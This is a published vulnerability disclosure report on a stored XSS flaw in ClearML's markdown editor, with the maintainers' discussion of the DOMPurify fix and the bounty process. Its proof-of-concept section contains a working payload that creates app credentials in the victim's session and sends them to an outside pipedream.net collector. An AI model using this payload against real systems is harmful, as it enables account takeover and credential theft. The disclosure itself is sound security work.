Stored XSS in Project description, Reports (markdown editor component) in allegroai/clearml-server

Valid

Reported on

Nov 4th 2023


Description

The Markdown editor component, as used in both the Project Description and Reports sections, does not apply proper data sanitization. When unfiltered data is passed to this component, it allows for the injection of malicious XSS payloads. Specifically, this vulnerability exists in the Project Description and Reports sections, making them susceptible to stored XSS attacks.

In the case of the project description, after creating a project and putting its name and description, in the overview, the project description is directly passed in this line in /app/webapp-common/project-info/project-info.component.ts file:

this.info = project.description;

then rendered here:

  <sm-markdown-editor
    #editor
    *ngIf="!loading"
    [class.editor]="editor.editMode"
    [data]="info"
    [readOnly]="example"
    (saveInfo)="saveInfo($event)"
  >
    <div no-data class="flex-middle overview-placeholder" *ngIf="!example">
      <i class="icon i-markdown xxl"></i>
      <div class="no-data-title">THERE’S NOTHING HERE YET…</div>
      <button (click)="editor.editClicked()" class="no-data-button btn btn-neon">
        <span>ADD PROJECT OVERVIEW</span>
      </button>
    </div>
  </sm-markdown-editor>
</div>

without any sanitization. This lack of sanitization allows attackers to craft and inject malicious XSS payloads into the project's description field.

Proof of Concept

The following video demonstrates the successful exploitation of this vulnerability, highlighting the generation of app credentials: POC

Here is the used payload:

<img src=x onerror="fetch('/api/v22.0/auth.create_credentials',{method:'POST',body: JSON.stringify({})}).then(function(r){return r.text()}).then(function(d){fetch('https://eocfpe5by1fjuzs.m.pipedream.net/',{method: 'POST', body: d})})">

Impact

This vulnerability has significant security implications, as it can lead to the compromise of user accounts and the manipulation of various critical functionalities within the application. The potential impacts of this vulnerability include:

1.User Profile Manipulation: Attackers can exploit the stored XSS to modify the profile names of users within the application. This could lead to impersonation, identity theft, and confusion among users.

2.Project Deletion: By using the XSS payload, an attacker can force a victim to delete their projects, potentially causing data loss and disruption in the application's functionality.

3.App Credential Abuse (which was demonstrated in the POC video): The most severe consequence of this vulnerability is the ability to generate app credentials using the victim's account. App credentials often hold significant privileges within the application, allowing users to perform various administrative actions. With the compromised app credentials, an attacker could:

-Create pipelines, which may lead to unauthorized data processing.

-Connect ClearML agents, potentially compromising the integrity of machine learning operations.

-Delete models, leading to potential data loss and system disruption.

-Perform other actions with the same level of privilege as the victim, thus undermining the overall security and stability of the application.

We are processing your report and will contact the allegroai/clearml-server team within 24 hours. 4 months ago
allegroai/clearml-server maintainer modified the report
4 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 4 months ago
We have contacted a member of the allegroai/clearml-server team and are waiting to hear back 4 months ago
allegroai/clearml-server maintainer
3 months ago

Hi, thank you for reporting this issue. We are working on a fix and will update here once it is available

We have sent a follow up to the allegroai/clearml-server team. We will try again in 4 days. 3 months ago
allegroai/clearml-server maintainer has acknowledged this report 3 months ago
allegroai/clearml-server maintainer
3 months ago

Hello, it's been some time since the last update on the reported issue. Do you have any updates regarding the progress on the fix?

allegroai/clearml-server maintainer
3 months ago

Thanks for following up - A fix has been implemented has been made available in the latest release.

allegroai/clearml-server maintainer
3 months ago

Thank you for the update. However, upon checking the latest release, it seems that the fix has not been applied, and the vulnerability persists. Could you please clarify the status of the fix or provide any additional information on this matter?

allegroai/clearml-server maintainer
3 months ago

Apologies for the missing clarity. The fix is available to anybody deploying the latest clearml-server v1.13.0. Where were you checking?

allegroai/clearml-server maintainer
3 months ago

Yes, I pull the last version from clearml-server repo, deployed it and retested the poc. I also checked the vulnerable code and it’s the same as last time.

allegroai/clearml-server maintainer
3 months ago

Hi Mokrane, just to make sure, did you also pulled clearml-web with the following changes?

public postRender = (dirty: string): string => {
    return DOMPurify.sanitize(dirty, { ADD_TAGS: ["iframe"], ADD_ATTR: ['allow', 'allowfullscreen', 'frameborder', 'scrolling'] })
  };
 <md-editor #editorComponent
               name="Content"
               [(ngModel)]="data"
               height="100%"
               [mode]="editMode ? 'editor' : 'preview'"
               [options]="options"
               [postRender]="postRender"
               [upload]="handleUpload"
               (onEditorLoaded)="editorReady($event)"
               (onPreviewDomChanged)="domFixes()"
               (ngModelChange)="checkDirty()"
    >
allegroai/clearml-server maintainer
3 months ago

Hello,

Thank you for bringing that to my attention. I apologize for any confusion. When you provided the commit for the release, I didn't notice the specific changes to markdown-editor.component.ts as it wasn't explicitly highlighted. It would have been helpful if the commit related to the vulnerability fix was provided separately.

Upon further analysis of the markdown-editor.component.ts changes, it appears to be fixed, and I couldn't identify any potential bypass. I appreciate your diligence in addressing this matter.

Regarding the deployment, I also noticed that the Docker image for clearml/clearml-web appears to be the older version, and the online deployed version app.clear.ml remains vulnerable, that's why my poc is still working whether in app.clear.ml or when deploying the last version of clearml/clearml-server since both of them are consuming from the Docker images.

Thank you for your ongoing efforts, and I look forward to the next steps in the triage process.

allegroai/clearml-server maintainer
3 months ago

Hi Mokrane,

app.clear.ml was just recently updated with the fix, feel free to try it again. As for the docker images, I'm not sure I follow you - the official allegroai/cleaml image is updated, and we do not have any clearml/clearml-web or clearml/clearml-server in our dockerhub account.

allegroai/clearml-server maintainer
3 months ago

Thank you for the update. I've retested app.clear.ml, and I can confirm that it's no longer vulnerable.

However, I would like to bring to your attention that the vulnerability still persists when deploying the repository clearml/clearml-server using the provided docker-compose file (/docker/docker-compose.yml). It seems that the fix might not have been applied to the clearml/clearml-server deployment through this specific configuration.

Regarding the Docker images, my initial assumption was that clearml/clearml-server might be consuming images from clearml/clearml-web, leading to the vulnerability. Could you provide more insight into how clearml/clearml-server gets its dependencies, and whether the Docker images for clearml/clearml-web are separate? Because I don't find any code of clearml-web in the clearml-server repo, even if the front-end is loaded when deploying clearml-serverwith docker (which is still vulnerable). This will help me understand the deployment structure better.

allegroai/clearml-server maintainer
3 months ago

Hi Mokrane,

I'm not sure what docker images you're referring to - there is no clearml/clearml-server docker image (just to make sure I'm not mistaken I even tried docker pull clearml/clearml-server and as expected I got an error), and the same goes for clearml/clearml-web (does not exist).

allegroai/clearml-server maintainer
3 months ago

Hello,

Apologies for any confusion. I have been referring to the Docker image specified in the docker compose file, which appears to be allegroai/clearml:latest. Regardless of the image name, the key point is that deploying the clearml/clearml-server repository (with Docker) using this docker-compose file still exposes the system to the reported XSS vulnerability.

allegroai/clearml-server maintainer
3 months ago

Hi Mokrane,

The latest tag there (1.13.0-414, which is identical to latest) contains this fix, are you sure you used that one?

allegroai/clearml-server maintainer
3 months ago

Thank you for the clarification. Upon further inspection, I realized that the Docker image I used for deployment was outdated. I assumed that docker-compose would automatically pull the latest image, but it appears this is not the case.

After pulling the latest image manually and redeploying, I can confirm that the fix is indeed applied, and the system is no longer vulnerable.

I appreciate your assistance in resolving this matter.

allegroai/clearml-server maintainer
3 months ago

Considering that the fix has been successfully applied, I believe the conditions for initiating a CVE request and the bounty process are now met. If there's anything further needed from my end or if you require additional details, please let me know.

allegroai/clearml-server maintainer
3 months ago

Hello, could you please consider adding @vvxhid, @ouxs-19, @malikdacoda as collaborators?

allegroai/clearml-server maintainer
3 months ago

We will gladly add these as contributors in the GitHub release notes (as well as yourself)

allegroai/clearml-server maintainer
2 months ago

Hello,

thank you for that, and may I inquire about the next steps for validating the report and initiating the CVE request?

Thank you again for your support.

allegroai/clearml-server maintainer validated this vulnerability 2 months ago
m0kr4n3 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
allegroai/clearml-server maintainer
2 months ago

Since this fix is applicable for the https://github.com/allegroai/clearml-web repository, can you please change the repository referenced in this report? Otherwise we cannot proceed with marking this as fixed.

Adam Nygate
2 months ago

Admin


Hello, we've resolved the issues with this report. Namely that the vulnerability affects a different repository.

The maintainer can now mark this vulnerability as fixed.

allegroai/clearml-server maintainer
2 months ago

Hello, the repo has been changed, can you proceed with marking this as fixed and publish the report, please?

Ben Harvie marked this as fixed in 1.13.0 with commit 4684fd 2 months ago
The fix bounty has been dropped
This vulnerability has now been published 2 months ago
Ben Harvie modified the Severity from High (7.5) to Medium (5.4) 15 days ago
to join this conversation